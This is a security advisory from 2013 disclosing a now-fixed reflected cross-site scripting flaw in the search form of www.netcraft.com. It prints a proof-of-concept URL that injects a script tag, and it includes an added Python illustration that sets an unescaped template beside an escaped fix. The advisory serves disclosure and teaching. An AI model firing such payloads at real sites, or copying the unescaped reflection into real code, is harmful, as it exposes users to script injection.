SSCHADV2013-008 - www.netcraft.com - Search Form Cross-site Scripting vulnerability
Advisory: www.netcraft.com – Search Form Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-008
Author: Stefan Schurtz
Affected Software: Successfully tested on www.netcraft.com
Vendor URL:
Vendor Status: fixed
======================
Vulnerability Description
======================
The ‘q’ parameter of the search form on www.netcraft.com is prone to an XSS vulnerability.
======================
PoC-Exploit
======================
// IE8 & IE 10 & Aurora 8.0
http://www.netcraft.com/search/?q=127.0.0.1"></iframe><script>alert(document.domain)</script>&submit=Search&submit=Search
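The following is an added illustration of the defect class and its fix, not code from the advisory or from netcraft.com. It assumes a hypothetical server-side template that reflects the search term into the value attribute of an input element (how netcraft.com actually rendered the term is not stated in the advisory). The PoC query string from above is used as the constructed input, and a small HTML parser shows that attribute-encoding the reflected value keeps it inside the attribute instead of letting it become new markup.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed input: the PoC URL quoted in the advisory (duplicate submit= dropped).
POC_URL = ('http://www.netcraft.com/search/?q=127.0.0.1"></iframe>'
           '<script>alert(document.domain)</script>&submit=Search')


def extract_q(url):
    """Return the raw 'q' parameter exactly as the server would receive it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("q", [""])[0]


def render_unsafe(q):
    """Hypothetical vulnerable template: the search term is reflected verbatim."""
    return f'<input type="text" name="q" value="{q}">'


def render_safe(q):
    """Hardened template: html.escape(quote=True) encodes & < > " and ',
    so the term can neither close the attribute nor open a new tag."""
    return f'<input type="text" name="q" value="{html.escape(q, quote=True)}">'


class TagCollector(HTMLParser):
    """Records every start tag with its (already entity-decoded) attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    """Return [(tag, attrs), ...] as a browser-like parser would see the markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def tag_names(markup):
    return [tag for tag, _ in parse_tags(markup)]


if __name__ == "__main__":
    q = extract_q(POC_URL)
    print("unsafe :", tag_names(render_unsafe(q)))   # ['input', 'script']
    print("safe   :", tag_names(render_safe(q)))     # ['input']
    # The hardened output still round-trips the user's term as plain data.
    print("value  :", parse_tags(render_safe(q))[0][1]["value"] == q)
```

The key point is that the encoding must match the output context: `html.escape(quote=True)` is right for a double-quoted attribute or element text, while a value placed inside a script block or a URL would need a different encoder.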
======================
Solution
======================
fixed
======================
Disclosure Timeline
======================
12-May-2013 – vendor informed by email
13-May-2013 – feedback from vendor
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.netcraft.com
http://www.darksecurity.de/advisories/2013/SSCHADV2013-008.txt